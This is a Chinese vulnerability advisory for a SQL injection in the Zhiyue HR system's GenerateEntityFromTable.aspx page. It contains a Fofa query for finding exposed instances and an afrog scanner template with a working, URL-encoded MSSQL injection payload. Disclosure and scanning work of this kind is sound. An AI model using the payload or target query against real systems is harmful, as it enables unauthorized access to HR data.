zhiyuehr-generate-entityfromtable-sqli: 智跃人力资源管理系统存在SQL注入漏洞

日期: 2025-09-01 | 影响软件: 智跃人力资源管理系统 | POC: 已公开

漏洞描述

智跃HR系统GenerateEntityFromTable处存在SQL注入漏洞。 Fofa: body="ZY.LOGO.64.png"

PoC代码[已公开]

id: zhiyuehr-generate-entityfromtable-sqli

info:
  name: 智跃人力资源管理系统存在SQL注入漏洞
  author: Y3y1ng
  severity: critical
  verified: true
  description: |
    智跃HR系统GenerateEntityFromTable处存在SQL注入漏洞。
    Fofa: body="ZY.LOGO.64.png"
  reference:
    - https://mp.weixin.qq.com/s/gn9tY5WPy39liSaWM0CU_A
  tags: zhiyue,hr,sqli
  created: 2023/12/04

set:
  r1: randomInt(10000, 99999)

rules:
  r0:
    request:
      method: GET
      path: /resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select%20SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES(%27MD5%27,%27{{r1}}%27)),3,32)))%2B%27
    expression: |
      response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/zhiyuehr-generate-entityfromtable-sqli.yaml

相关漏洞推荐